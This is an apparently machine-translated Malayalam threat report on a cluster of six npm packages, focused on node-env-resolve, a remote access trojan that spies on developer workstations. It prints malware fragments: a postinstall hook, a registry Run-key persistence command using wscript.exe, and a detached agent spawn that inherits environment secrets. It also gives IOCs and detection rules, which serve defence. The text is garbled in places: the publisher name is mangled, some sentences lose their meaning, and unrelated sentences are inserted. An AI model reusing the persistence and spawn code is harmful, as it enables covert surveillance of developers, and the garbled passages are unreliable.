അച്ചു ഡി.ആർ.
2026 ഏപ്രിൽ 1 നും മെയ് 3 നും ഇടയിൽ, ഒരൊറ്റ npm പ്രസാധകൻ, user0001, സ്ഥിരീകരിക്കാത്ത Gmail വിലാസത്തിൽ രജിസ്റ്റർ ചെയ്തിരിക്കുന്നു tanvisoul9@gmail.com, മനഃപൂർവ്വം മങ്ങിയതും അടിസ്ഥാന സൗകര്യങ്ങൾ ശബ്ദിക്കുന്നതുമായ പേരുകളുള്ള ആറ് പാക്കേജുകൾ നിശബ്ദമായി തള്ളിവിട്ടു: centralogger, dom-utils-lite, node-fetch-lite, connector-agent, node-gyp-runtime, ഒപ്പം node-env-resolve.
ഏറ്റവും പുതിയ രണ്ട് പതിപ്പുകൾ node-env-resolve, 1.0.7 ഉം 1.0.8 ഉം, മെയ് 2 ന് സൈജെനിയുടെ മാൽവെയർ ഏർലി വാണിംഗ് (MEW) സിസ്റ്റം ഫ്ലാഗ് ചെയ്തു, മെയ് 3 ന് ക്ഷുദ്രകരമായി സ്ഥിരീകരിച്ചു.
ഇംപ്ലാന്റ് അസാധാരണമല്ല, കാരണം അത് അങ്ങനെയല്ല: ടെലിഗ്രാം ബോട്ടുകളില്ല, OAST കോൾബാക്കുകളില്ല, ഇല്ല. അപകീർത്തിപ്പെടുത്തൽ, ഇൻസ്റ്റാൾ ചെയ്യുന്ന സമയത്ത് AWS ക്രെഡൻഷ്യലുകൾ പിടിച്ചെടുക്കാൻ ശ്രമിച്ചില്ല. പകരം, postinstall.js ഒരു HKCU റൺ കീ ഉപയോഗിച്ച്, ഒരു വിൻഡോസ് ബൂട്ട്-പെർസിസ്റ്റൻസ് എൻട്രി സ്ഥാപിക്കുന്നു, അത് സമാരംഭിക്കുന്നു wscript.exe ഒരു VBS സ്റ്റബിനെതിരെ. പിന്നീട് അത് മൈക്രോഫോൺ ക്യാപ്ചർ, ബ്രൗസർ-ഹിസ്റ്ററി മോഷണം, സ്ക്രീൻഷോട്ടിംഗ്, മൗസ്/കീബോർഡ് സിമുലേഷൻ എന്നിവയ്ക്കായുള്ള മൊഡ്യൂളുകൾ ബണ്ടിൽ ചെയ്യുന്ന ഒരു വേർപെടുത്തിയ Node.js ഏജന്റിനെ സൃഷ്ടിക്കുന്നു.
നമ്മൾ ഈ ക്ലസ്റ്ററിനെ വിളിക്കുന്നു ഡെവലപ്ടാപ്പ്, കിറ്റ് കഴിഞ്ഞാൽ അത് ഒരു ഡെവലപ്പറുടെ മെഷീനിൽ പ്രവർത്തിക്കാൻ പോകുന്നു.
ഈ ലേഖനം എഴുതുന്ന സമയത്ത് ആറ് പാക്കേജുകളും npm-ൽ തത്സമയമായിരുന്നു. ഞങ്ങൾ അവ രജിസ്ട്രിയുടെ ദുരുപയോഗ ചാനലിൽ സമർപ്പിച്ചിട്ടുണ്ട്. നീക്കം ചെയ്യുന്നതുവരെ പ്രസാധകരിൽ നിന്ന് ഏതെങ്കിലും ഇൻസ്റ്റാളുകൾ ഡിഫൻഡർമാർ പിൻവലിക്കണം.
ക്ലസ്റ്റർ: ആറ് പാക്കേജുകൾ, ഒരു പ്രസാധകൻ
പ്രസാധക അക്കൗണ്ട് user0001 പരിശോധിച്ചിട്ടില്ല. ഇതിന് ഇല്ല SCM സ്ഥിരീകരണം, ഡൊമെയ്ൻ-ബൗണ്ട് ഇമെയിൽ ഇല്ല, മുൻ ചരിത്രവുമില്ല. Gmail ഹാൻഡിൽ tanvisoul9 ഞങ്ങൾക്ക് കണ്ടെത്താൻ കഴിയുന്ന മറ്റ് ഒരു npm പ്രസാധക റെക്കോർഡിലും ഇത് ദൃശ്യമാകില്ല.
ആറ് പാക്കേജുകളും ഒരേ പരിപാലകനെ പട്ടികപ്പെടുത്തുന്നു, ഒരേ അക്കൗണ്ടിൽ നിന്ന് പ്രസിദ്ധീകരിച്ചു, ഒരേ കാര്യം പങ്കിടുന്നു. package.json ബോയിലർപ്ലേറ്റ്. ഇല്ല repository, അല്ല homepage, ഇല്ല description ഒരു വരിയെക്കാൾ നീളം.
പേരിടൽ തന്ത്രമാണ് രസകരമായ ഭാഗം. ഒരു ക്ലാസിക് ആശ്രിതത്വ-ആശയക്കുഴപ്പം അല്ലെങ്കിൽ ടൈപ്പോസ്ക്വാട്ട് കാമ്പെയ്നിൽ നിന്ന് വ്യത്യസ്തമായി, ഈ പേരുകളൊന്നും ഒരു പ്രത്യേക അപ്സ്ട്രീം ലൈബ്രറിയെ ലക്ഷ്യം വയ്ക്കുന്നു. പകരം, അവ ഒരു യഥാർത്ഥമായി അപ്രത്യക്ഷമാകാൻ കാലിബ്രേറ്റ് ചെയ്തിരിക്കുന്നു. package.json or npm ls .ട്ട്പുട്ട്.
| പാക്കേജ് | ആദ്യം പ്രസിദ്ധീകരിച്ചത് | പുതിയ പതിപ്പ് | പതിപ്പുകൾ | ക്ലസ്റ്ററിലെ പങ്ക് |
|---|---|---|---|---|
| സെൻട്രലോഗർ | 2026-04-01 12:46 UTC | 1.0.9 | 5, 1.0.5 മുതൽ 1.0.9 വരെ | ക്ലസ്റ്ററിന്റെ “ലോഗിംഗ് യൂട്ടിലിറ്റി” കവർ; ആദ്യം പ്രസിദ്ധീകരിച്ചത് |
| ഡോം-യൂട്ടിലിസ്-ലൈറ്റ് | 2026-04-14 07:36 UTC | 1.0.3 | 3 | പൊതുവായ DOM-സഹായി കവർ |
| നോഡ്-ഫെച്ച്-ലൈറ്റ് | 2026-04-19 10:22 UTC | 1.0.2 | 3 | മിമിക്സ് നോഡ്-ഫെച്ച് കുടുംബം |
| കണക്ടർ-ഏജന്റ് | 2026-04-25 05:12 UTC | 1.0.0 | 1 | "ഏജന്റ്" എന്ന പൊതുനാമം |
| നോഡ്-ജിപ്-റൺടൈം | 2026-04-25 05:17 UTC | 1.0.0 | 1 | മിമിക്സ് നേറ്റീവ്-മൊഡ്യൂൾ ബിൽഡ് ടൂളിംഗ് |
| നോഡ്-എൻവി-റിസോൾവ് | 2026-04-25 05:21 UTC | 1.0.9 | 10, 1.0.0 മുതൽ 1.0.9 വരെ | സജീവ ഡ്രോപ്പർ; പൂർണ്ണ ഇംപ്ലാന്റ് |
പോലുള്ള പേരുകൾ centralogger, node-fetch-lite, ഒപ്പം node-gyp-runtime കോഡ് അവലോകനത്തിൽ വിവാദരഹിതമായി കാണപ്പെടാൻ വേണ്ടി രൂപകൽപ്പന ചെയ്തിരിക്കുന്നു. അവ ഒരു പ്രോജക്റ്റിന്റെ ഡിപൻഡൻസി ട്രീയിൽ ഇതിനകം ഉള്ള കാര്യങ്ങൾ പോലെ തോന്നുന്നു.
പുതിയതും പരിശോധിക്കാത്തതുമായ ഒരു പ്രസാധകനും നഷ്ടപ്പെട്ട റിപ്പോസിറ്ററി ലിങ്കുകളും സംയോജിപ്പിച്ച്, അവ തിരിച്ചറിയാവുന്ന ഒരു പാറ്റേൺ രൂപപ്പെടുത്തുന്നു: കുറഞ്ഞ ഘർഷണം ഉള്ള പേരുകൾ രജിസ്ട്രിയിൽ വിതയ്ക്കുന്ന ഒരു നടൻ, തുടർന്ന് പ്രധാനപ്പെട്ട ഒന്നിലേക്ക് വേഗത്തിൽ ആവർത്തിക്കുന്നു. ഈ സാഹചര്യത്തിൽ, node-env-resolve എട്ട് ദിവസത്തിനുള്ളിൽ പത്ത് പതിപ്പുകൾ ലഭിച്ചു.
ഒരു വിൻഡോസ് ഡെവലപ്മെന്റ് ബോക്സിൽ എന്താണ് സംഭവിക്കുന്നത്
ദുഷ്ട ശൃംഖല node-env-resolve:1.0.8 ഒരു npm RAT-ന് ഹ്രസ്വവും, നേരിട്ടുള്ളതും, അസാധാരണമാംവിധം സവിശേഷതകളാൽ സമ്പന്നവുമാണ്.
പോസ്റ്റ്ഇൻസ്റ്റാൾ: പെർസിസ്റ്റൻസ് ആൻഡ് ഡിറ്റാച്ച്ഡ് ഏജന്റ്
package.json ഒരു സിംഗിൾ ഇൻസ്റ്റാൾ ഹുക്ക് പ്രഖ്യാപിക്കുന്നു:
{ "scripts": { "postinstall": "node postinstall.js" } }postinstall.js മൂന്ന് കാര്യങ്ങൾ ക്രമത്തിൽ ചെയ്യുന്നു.
ആദ്യം, ഇത് npm ട്രീയ്ക്ക് പുറത്ത് ഒരു ഇൻസ്റ്റലേഷൻ ഡയറക്ടറിയെ ഘട്ടം ഘട്ടമായി മാറ്റുന്നു. സ്ക്രിപ്റ്റിൽ റൺടൈമിലാണ് പാത്ത് കണക്കാക്കുന്നത്. INSTALL_DIR. പിന്നെ അത് ഒരു ആന്തരികം പ്രവർത്തിപ്പിക്കുന്നു execSync('npm install --production --silent ...') ഇംപ്ലാന്റിന്റെ റൺടൈം ഡിപൻഡൻസികൾ വലിച്ചെടുക്കാൻ അതിനുള്ളിൽ. ഇത് ഏജന്റിനെ ഡിസ്കിൽ എവിടെയെങ്കിലും ഒരു മാനുവലിൽ സ്ഥാപിക്കുന്നു. node_modules ഓഡിറ്റ് കണ്ടെത്തുകയില്ല.
രണ്ടാമതായി, അത് ഒരു VBS ലോഞ്ചർ എഴുതുകയും ബൂട്ട് സ്ഥിരതയ്ക്കായി അത് രജിസ്റ്റർ ചെയ്യുകയും ചെയ്യുന്നു:
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run \ /v ${AGENT_NAME} \ /t REG_SZ \ /d "wscript.exe \"${vbsPath}\"" /fwscript.exe എന്നത് Windows Script Host ആണ്, ഇത് പ്രവർത്തിക്കുന്ന ഒരു ഒപ്പിട്ട Microsoft ബൈനറി ആണ് .vbs കൺസോൾ വിൻഡോ ഇല്ലാത്ത ഫയലുകൾ. അത് പ്രീcisഓട്ടോറൺ സ്റ്റബുകൾക്ക് ഇത് അനുകൂലമാകുന്നത് എന്തുകൊണ്ടാണ്.
ഒരു പൊരുത്തവും ഉണ്ട് reg delete ഉള്ളിലേക്കുള്ള വഴി src/index.js, ഓപ്പറേറ്റർ കമാൻഡിൽ ഇംപ്ലാന്റ് വൃത്തിയായി നീക്കം ചെയ്യാവുന്ന തരത്തിൽ രൂപകൽപ്പന ചെയ്തിരിക്കുന്നുവെന്ന് സൂചിപ്പിക്കുന്നു.
മൂന്നാമതായി, അത് ഒരു വേർപിരിഞ്ഞ ശിശു പ്രക്രിയയ്ക്ക് കാരണമാകുന്നു:
spawn(node, [path.join(INSTALL_DIR, 'src/index.js')], { detached: true, env: { ...process.env, SERVER_URL } })രണ്ട് വിശദാംശങ്ങൾ ഇവിടെ പ്രധാനമാണ്.
SERVER_URL പരിസ്ഥിതിയിൽ നിന്ന് വായിക്കുന്നു. തൽഫലമായി, C2 എൻഡ്പോയിന്റ് ഓരോ വിന്യാസത്തിനും കോൺഫിഗർ ചെയ്യാവുന്നതാണ്, പാക്കേജിൽ ബേക്ക് ചെയ്യപ്പെടുന്നില്ല. ആ ചെറുതെങ്കിലും മനഃപൂർവ്വമായ തിരഞ്ഞെടുപ്പ് മിക്ക സ്റ്റാറ്റിക്-IOC സ്വീപ്പുകളെയും പരാജയപ്പെടുത്തുന്നു.
കൂടാതെ, പ്രജനനം ചെയ്യപ്പെട്ട കുട്ടിക്ക് പൂർണ്ണ രക്ഷാകർതൃ അന്തരീക്ഷം അവകാശപ്പെടുന്നു. അതിനാൽ, ഏതെങ്കിലും NPM_TOKEN, AWS_*, GITHUB_TOKEN, അല്ലെങ്കിൽ ഇൻസ്റ്റാൾ ചെയ്യുന്ന സമയത്ത് ഡെവലപ്പർ ഷെല്ലിൽ ഉള്ള SSH-ഏജന്റ് സോക്കറ്റ് ദീർഘകാല ഏജന്റിന്റെ മെമ്മറിയിലേക്ക് സഞ്ചരിക്കുന്നു.
ഏജന്റ് എന്താണ് അയയ്ക്കുന്നത്
ബണ്ടിൽ ചെയ്തത് src/ ട്രീയിൽ മൂന്ന് മൊഡ്യൂളുകൾ ഉൾപ്പെടുന്നു, അവയുടെ പേരുകൾ മാത്രം കഥ പറയുന്നു: audioCapture.js, browserHistory.js, ഒപ്പം systemInfo.js.
റൺടൈം ഡിപൻഡൻസി ലിസ്റ്റ്, സ്റ്റേജ് ചെയ്ത സമയത്ത് പരിഹരിച്ചു npm install, അവയെ സ്ഥിരീകരിക്കുന്നു.
ഈ സമീപനം ഒരു കുഴപ്പത്തിലായ സംഭവത്തെ നിയന്ത്രിത പ്രതികരണമാക്കി മാറ്റുന്നു.
അന്ധമായി പ്രതികരിക്കുന്നതിനുപകരം, ടീമുകൾ പ്രവർത്തിക്കുന്നത് വ്യക്തമായ മുൻഗണനാക്രമീകരണവും വേഗത്തിലുള്ള പരിഹാരവും.
| ആശ്രയത്വം | ഈ സന്ദർഭത്തിൽ അത് എന്തിനുവേണ്ടിയാണ്? |
|---|---|
| സ്ക്രീൻഷോട്ട്-ഡെസ്ക്ടോപ്പ് | ആനുകാലിക സ്ക്രീൻ ക്യാപ്ചർ |
| @നട്ട്-ട്രീ-ഫോർക്ക്/നട്ട്-ജെഎസ് | മൗസ്, കീബോർഡ് ഓട്ടോമേഷൻ / ഇൻപുട്ട് സിമുലേഷൻ |
| മെച്ചപ്പെട്ട-sqlite3 | Chrome, Edge, Firefox ചരിത്രം SQLite ഡാറ്റാബേസുകളുടെ നേരിട്ടുള്ള വായനകൾ |
| അഡ്മിൻ-സിപ്പ് | പുറന്തള്ളുന്നതിനുമുമ്പ് ശേഖരിച്ച പുരാവസ്തുക്കൾ ബണ്ടിൽ ചെയ്യുന്നു |
| മൂർച്ച | സ്ക്രീൻഷോട്ടുകളുടെയും ഇമേജ് ആർട്ടിഫാക്റ്റുകളുടെയും വലുപ്പം മാറ്റൽ / കംപ്രസ് ചെയ്യൽ |
| സോക്കറ്റ്.ഐഒ-ക്ലയന്റ് | സ്ഥിരമായ ദ്വിദിശ C2 ചാനൽ |
| നോഡ്-മെഷീൻ-ഐഡി | ഇരയെ ട്രാക്ക് ചെയ്യുന്നതിനായി സ്ഥിരമായ ഓരോ ഹോസ്റ്റ് ഫിംഗർപ്രിന്റ് |
systemInfo.js കോളുകൾ os.networkInterfaces() ആദ്യ ബീക്കണിന് മുമ്പ് കൂടുതൽ വിരലടയാളത്തിനായി.
ഓഡിയോ ക്യാപ്ചർ എന്തുകൊണ്ട് ഒരു മികച്ച സിഗ്നലാണ്
MEW-യിൽ ഞങ്ങൾ ട്രയേജ് ചെയ്യുന്ന മിക്ക npm RAT-കളും ഇൻസ്റ്റാൾ-ടൈം രഹസ്യ മോഷണത്തിൽ അവസാനിക്കുന്നു. അവർ വായിക്കുന്നു ~/.npmrc, വായിക്കുക ~/.aws/credentials, ചുരണ്ടുക process.env, ഒരു വെബ്ഹുക്കിലേക്ക് പോസ്റ്റ് ചെയ്യുക, പുറത്തുകടക്കുക. അത് ഒരു തകർപ്പൻ സാമ്പത്തിക മോഡലിന് അനുയോജ്യമാണ്. ക്രെഡൻഷ്യലുകൾക്ക് ഹ്രസ്വമായ അർദ്ധായുസ്സാണുള്ളത്, ആക്രമണകാരി വേഗത്തിൽ ധനസമ്പാദനം നടത്തേണ്ടതുണ്ട്.
node-env-resolve ആകൃതിയിൽ വ്യത്യസ്തമാണ്.
റീബൂട്ടിനെ അതിജീവിക്കുന്നതിനാണ് പെർസിസ്റ്റൻസ് സജ്ജീകരിച്ചിരിക്കുന്നത്. ഏജന്റ് വേർപെടുത്തി ദീർഘകാലം നിലനിൽക്കും. wscript.exe. ഇത് വഹിക്കുന്ന കിറ്റ് ഒരു ഡെവലപ്പറുടെ മെഷീനിൽ ഉണ്ടായിരിക്കുന്നതിനാണ്, ഒരു മൈക്രോഫോൺ റെക്കോർഡർ, ഒരു കീബോർഡ്/മൗസ് ഡ്രൈവർ, പൂർണ്ണ ബ്രൗസർ-ചരിത്ര ഇൻജസ്റ്റ്, സ്ക്രീൻ ക്യാപ്ചർ, കോൺഫിഗർ ചെയ്യാവുന്ന C2-ലേക്ക് തിരികെ ഒരു ഇന്ററാക്ടീവ് Socket.IO ചാനൽ എന്നിവ പിടിച്ചെടുക്കാനും പോകാനുമുള്ളതല്ല.
പ്രത്യേകിച്ച് മൈക്രോഫോൺ ക്യാപ്ചർ എന്നത് ഈ കാമ്പെയ്ൻ കടന്നുപോകുന്ന രേഖയാണ്, മിക്ക npm മാൽവെയറുകളും അത് മറികടക്കുന്നില്ല.
ഒരു ഡെവലപ്പർ വർക്ക്സ്റ്റേഷൻ, ഡെവലപ്പർമാർ സ്റ്റാൻഡ്-അപ്പുകൾ, ഉപഭോക്തൃ കോളുകൾ, ഡിസൈൻ ചർച്ചകൾ, ഓൺ-കോൾ ബ്രിഡ്ജുകൾ എന്നിവ എടുക്കുന്ന വർക്ക്സ്റ്റേഷൻ കൂടിയാണ്. മൈക്രോഫോൺ റെക്കോർഡ് ചെയ്യുന്ന ഒരു ഇംപ്ലാന്റ് യഥാർത്ഥത്തിൽ ഡെവലപ്പറുടെ npm ടോക്കണിന് ശേഷമല്ല. ഡെവലപ്പർ ലാപ്ടോപ്പിന് മുന്നിൽ എന്താണ് പറയുന്നതെന്ന് അനുസരിച്ചാണ് ഇത്.
ആ കഴിവുകളുടെ കൂട്ടവും, അവ്യക്തതയുടെ അഭാവവും, മിന്നുന്ന ഇൻസ്റ്റാളേഷൻ സമയ എക്സ്ഫിൽട്രേഷന്റെ അഭാവവും, അവസരവാദപരമായ ക്രെഡൻഷ്യൽ മോഷണത്തേക്കാൾ, ലക്ഷ്യബോധമുള്ള ആക്സസിനുള്ള ഒരു മുൻകൂർ സ്ഥാനനിർണ്ണയമായി വായിക്കപ്പെടുന്നു.
ഇതിൽ നിന്നുമാത്രം ഞങ്ങൾ ആട്രിബ്യൂഷൻ ഉറപ്പിക്കുന്നില്ല. പ്രവർത്തന പ്രൊഫൈൽ ഞങ്ങൾ ശ്രദ്ധിക്കുന്നു.

എട്ട് ദിവസത്തെ ആവർത്തന കാഡൻസ് node-env-resolve ടൈംലൈനിലെ ഏറ്റവും പ്രവർത്തനപരമായി പറയുന്ന വിശദാംശമാണ്.
ഇത് തീയും മറന്നും പ്രവർത്തിക്കുന്ന ഒരു ഡ്രോപ്പ് അല്ല. പ്രസാധകൻ ഡ്രോപ്പർ സജീവമായി പരിപാലിക്കുന്നു, സാധാരണയായി രണ്ട് കാര്യങ്ങളിൽ ഒന്ന് എന്നാണ് ഇതിനർത്ഥം. ഒന്നുകിൽ അവർ വിശാലമായ വിന്യാസത്തിന് മുമ്പ് പരീക്ഷണ പരിതസ്ഥിതികൾക്കെതിരെ അത് ട്യൂൺ ചെയ്യുന്നു, അല്ലെങ്കിൽ അവർ ഇതിനകം തന്നെ ഇൻസ്റ്റാൾ ടെലിമെട്രി തിരികെ വന്ന് അതിനോട് പ്രതികരിക്കുന്നു.
മറ്റ് അഞ്ച് പാക്കേജുകളും അവയുടെ പ്രാരംഭ പ്രസിദ്ധീകരണത്തിന് ശേഷം ഫലത്തിൽ ഒരു മാറ്റവും വരുത്തിയില്ല. എഞ്ചിനീയറിംഗ് ശ്രമം ജോലി ചെയ്യുന്ന പാക്കേജിൽ ശ്രദ്ധ കേന്ദ്രീകരിക്കുമ്പോൾ, പിന്തുണയ്ക്കുന്ന ക്ലസ്റ്ററിന് "ഒരിക്കൽ ഘട്ടം, പേരുള്ള അവധി" എന്ന പാറ്റേൺ അനുയോജ്യമാണ്.
കടപ്പാട്: ചെറിയ സൂചനകൾ, ഉറച്ച വിധിയില്ല
പൊതു ഒസിംത് സിഗ്നലുകൾ നേർത്തതാണ്, ഞങ്ങൾ അവയെ വലിച്ചുനീട്ടുകയില്ല. എന്താണ് നിരീക്ഷിക്കാവുന്നത്:
ജിമെയിൽ ഹാൻഡിൽ tanvisoul9 "താൻവി" എന്ന ദക്ഷിണേഷ്യൻ പേരിനോട് ഭാഗികമായി സാമ്യമുണ്ട്. ഇതൊരു ദുർബലമായ സിഗ്നലാണ്. ജിമെയിൽ ഹാൻഡിലുകൾ ഐഡന്റിറ്റിയല്ല, പിന്നിലുള്ളത് soul9 പൊതുവായതാണ്. ഒരു ഇമെയിൽ പ്രാദേശിക ഭാഗത്തെ മാത്രം അടിസ്ഥാനമാക്കി ഭൂമിശാസ്ത്രം അനുമാനിക്കുന്നത് സുരക്ഷിതമല്ല.
കോഡ് ശൈലി ശ്രദ്ധേയമല്ല Node.js: standard ലൈബ്രറി കോളുകൾ പോലുള്ളവ os, child_process, spawn, ഒപ്പം reg add. ഇതിൽ അവ്യക്തതയില്ല, സ്ട്രിംഗ് റൊട്ടേഷനില്ല, ആന്റി-ഡീബഗ് ലോജിക്കുമില്ല. വിൻഡോസ് രജിസ്ട്രി പ്രിമിറ്റീവുകളും ഡിറ്റാച്ച്ഡ്-ചൈൽഡ്-പ്രോസസ് ഓർക്കസ്ട്രേഷനും രചയിതാവിന് സുഖകരമാണ്, പക്ഷേ അവർ ഉപയോഗിക്കുന്നതായി തോന്നുന്ന കൂടുതൽ രഹസ്യമായ ട്രേഡ്ക്രാഫ്റ്റുകൾക്കായി അദ്ദേഹം ശ്രമിക്കുന്നതായി തോന്നുന്നില്ല.
ആശ്രിതത്വങ്ങൾ പൂർണ്ണമായും ഒഴിവാക്കപ്പെട്ടതും അറിയപ്പെടുന്നതുമാണ്: screenshot-desktop, nut-js, better-sqlite3, ഒപ്പം socket.io-client. ഒരു കസ്റ്റം പ്രോട്ടോക്കോളില്ല, റോൾഡ്-ഫ്രം-സ്ക്രാച്ച് C2 സ്റ്റാക്ക് ഇല്ല, ഒരു പാഠപുസ്തകത്തിനപ്പുറം ഒരു നൂതന പെർസിസ്റ്റൻസ് ട്രിക് ഇല്ല. HKCU റൺ കീ. ഇതൊരു കഴിവുള്ള ഇന്റഗ്രേറ്ററാണ്, ഒരു ടൂൾ രചയിതാവല്ല.
പ്രസിദ്ധീകരിച്ച കലാസൃഷ്ടികളിൽ ഇംഗ്ലീഷല്ലാത്ത സ്ട്രിംഗുകൾ, എംബഡഡ് കമന്റുകൾ, ലോക്കേൽ ഡാറ്റ, അല്ലെങ്കിൽ കംപൈലർ-ഔട്ട്പുട്ട് സമയമേഖല ഫിംഗർപ്രിന്റുകൾ എന്നിവ ഞങ്ങൾ കണ്ടെത്തിയില്ല.
ഞങ്ങൾ ഇതിനകം ട്രാക്ക് ചെയ്ത മുൻ കാമ്പെയ്നുകളുമായി കോഡ് ഓവർലാപ്പ് ഉണ്ടോയെന്ന് ഞങ്ങൾ പരിശോധിച്ചു, അതിൽ ഉൾപ്പെടുന്നവയും ഉൾപ്പെടുന്നു ഷായ്-ഹുലുദ്, ഓലിവിയൻ, ബിൽഡ്കൈറ്റ്, സമീപകാല ഹെയ്ബായ് / claude-code-best ആന്ത്രോപിക്-CLI ക്ലോൺ കുടുംബം. ഞങ്ങൾക്ക് ഒന്നും കണ്ടെത്താൻ കഴിഞ്ഞില്ല: പങ്കിട്ട C2 പാറ്റേണുകളില്ല, പങ്കിട്ട ഫയൽ ലേഔട്ടുകളില്ല, പങ്കിട്ട ഐഡിയമുകളുമില്ല.
ഞങ്ങൾ പറയില്ല: ഇതൊരു സംസ്ഥാന പ്രവർത്തകൻ, അറിയപ്പെടുന്ന ഒരു ഗ്രൂപ്പ്, അല്ലെങ്കിൽ ഏതെങ്കിലും പ്രത്യേക രാജ്യവുമായി ഭൂമിശാസ്ത്രപരമായി ബന്ധപ്പെട്ടിരിക്കുന്നു.
ഡെവലപ്പർ-വർക്ക്സ്റ്റേഷൻ നിരീക്ഷണം നടത്തുന്ന ചെറുതും മിതമായ വൈദഗ്ധ്യമുള്ളതുമായ ഒരു ടീമുമായി പ്രവർത്തന പ്രൊഫൈൽ പൊരുത്തപ്പെടുന്നു. ആക്സസിന്റെ ഡൗൺസ്ട്രീം ഉപയോഗത്തിലൂടെ ഇത് സാമ്പത്തികമായി പ്രചോദിതമാകാൻ സാധ്യതയുണ്ട്, മാത്രമല്ല ഒരു പ്രത്യേക വാങ്ങുന്നയാൾക്കുള്ള ഒരു സേവനമെന്ന നിലയിൽ നിരീക്ഷണവും സാധ്യമാണ്.
രണ്ട് പരോക്ഷ പോയിന്റുകൾ പിന്തുണയ്ക്കുന്നു: ടെലിഗ്രാം ബോട്ടുകൾ പോലുള്ള ക്ലസ്റ്ററിനെ വേഗത്തിൽ കത്തിക്കുന്ന ശ്രദ്ധ പിടിച്ചുപറ്റുന്ന എക്സ്ഫിൽട്രേഷൻ മെക്കാനിക്സുകൾ ഒഴിവാക്കൽ, oastify.com, അല്ലെങ്കിൽ കാനറിടോക്കണുകൾ, മനഃപൂർവ്വം മങ്ങിയ പാക്കേജ് നാമങ്ങൾ എന്നിവ ഉൾപ്പെടുന്നു, ഇവ ഹ്രസ്വമായ ഉയർന്ന വോളിയം സ്പൈക്കിന് മുകളിലുള്ള നിശബ്ദ ലോംഗ്-ടെയിൽ ഇൻസ്റ്റാളുകളെ അനുകൂലിക്കുന്നു.
വിട്ടുവീഴ്ചയുടെയും കണ്ടെത്തലിന്റെയും സൂചകങ്ങൾ
| പാക്കേജുകളും പ്രസാധകരും | |
|---|---|
| ഫീൽഡ് | വില |
| എൻപിഎം പ്രസാധകൻ | ഉസെര്ക്സനുമ്ക്സ |
| പ്രസാധക ഇമെയിൽ | tanvisoul9@gmail.com, പരിശോധിച്ചുറപ്പിച്ചിട്ടില്ല |
| പാക്കേജുകൾ | സെൻട്രലോഗർ, ഡോം-യൂട്ടിലിസ്-ലൈറ്റ്, നോഡ്-ഫെച്ച്-ലൈറ്റ്, കണക്റ്റർ-ഏജന്റ്, നോഡ്-ജിപ്-റൺടൈം, നോഡ്-എൻവി-റിസോൾവ് |
| സ്ഥിരീകരിച്ച ദോഷകരമായത് | നോഡ്-എൻവി-റെസോൾവ്@1.0.7, നോഡ്-എൻവി-റെസോൾവ്@1.0.8 |
| ഹോസ്റ്റ് ആർട്ടിഫാക്റ്റുകൾ | |
|---|---|
| ടൈപ്പ് ചെയ്യുക | വില |
| പെർസിസ്റ്റൻസ് കീ | HKCU\സോഫ്റ്റ്വെയർ\മൈക്രോസോഫ്റ്റ്\വിൻഡോസ്\കറന്റ്വേർഷൻ\റൺ |
| സ്ഥിരത മൂല്യം | വേരിയബിൾ നാമം; wscript.exe ഫോമിന്റെ ഡാറ്റ " \ .vbs" എന്നതിൽ നിന്ന് വ്യത്യസ്തമായി |
| ഹുക്ക് ഇൻസ്റ്റാൾ ചെയ്യുക | postinstall: പാക്കേജ് മാനിഫെസ്റ്റിലെ postinstall.js നോഡ് |
| ഇംപ്ലാന്റ് മൊഡ്യൂളുകൾ | src/audioCapture.js, src/browserHistory.js, src/systemInfo.js |
| സ്റ്റേജിംഗ് ഡയറക്ടറി | പ്രോജക്റ്റിന്റെ node_modules ന് പുറത്ത് INSTALL_DIR പരിഹരിച്ചു; ഇൻസ്റ്റാൾ സമയത്ത് postinstall.js ആണ് സ്ഥാനം സജ്ജമാക്കിയത്. |
| നെറ്റ്വർക്ക് | |
|---|---|
| ടൈപ്പ് ചെയ്യുക | വില |
| C2 ഗതാഗതം | socket.io-client, സ്ഥിരമായ ദ്വിദിശ ചാനൽ |
| C2 എൻഡ്പോയിന്റ് | SERVER_URL എൻവയോൺമെന്റ് വേരിയബിൾ വഴി ഏജന്റിന് നൽകിയിരിക്കുന്നു; പ്രസിദ്ധീകരിച്ച ആർട്ടിഫാക്റ്റുകളിലേക്ക് ഹാർഡ്-കോഡ് ചെയ്തിട്ടില്ല. |
കണ്ടെത്തൽ കുറിപ്പുകൾ
C2 എൻഡ്പോയിന്റ് ആവശ്യമില്ലാതെ തന്നെ രണ്ട് നിയമങ്ങൾ ഈ കുടുംബത്തെ പിടികൂടുന്നു.
ആദ്യം, ഫ്ലാഗ് പോസ്റ്റ്ഇൻസ്റ്റാൾ ചെയ്യുക ഒരു ഇന്റേണൽ നിർവ്വഹിക്കുന്ന സ്ക്രിപ്റ്റുകൾ npm install പാക്കേജിന്റെ സ്വന്തം ഡയറക്ടറിക്ക് പുറത്തുള്ള ഒരു പാതയിലേക്ക്. ഏതെങ്കിലും നിയമാനുസൃതമായ പ്രീബിൽഡ് ഡൗൺലോഡർ, ഉദാ. node-gyp പുനർനിർമ്മിക്കുന്നു അല്ലെങ്കിൽ പ്രീബിൽറ്റ്-ബൈനറി ഡൗൺലോഡറുകൾ, പാക്കേജിനുള്ളിൽ അല്ലെങ്കിൽ പ്ലാറ്റ്ഫോമിലേക്ക് എഴുതുന്നു-standard പരിശോധിച്ചുറപ്പിച്ച ഹാഷുകളുള്ള കാഷെ പാതകൾ. ഇത് പുതുതായി സൃഷ്ടിച്ചതിലേക്ക് എഴുതുന്നില്ല INSTALL_DIR ഡിസ്കിൽ മറ്റെവിടെയെങ്കിലും.
രണ്ടാമതായി, ഇഷ്യൂ ചെയ്യുന്ന സ്ക്രിപ്റ്റുകൾ ഫ്ലാഗ് പോസ്റ്റ് ഇൻസ്റ്റാൾ ചെയ്യുക reg add HKCU\…\Run കൂടെ wscript.exe ലോഞ്ചർ എന്ന നിലയിൽ. ഇത് ഒരു npm പാക്കേജിൽ നിന്ന് ഒരിക്കലും നിയമാനുസൃതമല്ല. ഇത് ഫ്ലാഗ് ചെയ്ത് ക്വാറന്റൈൻ ചെയ്യുക.
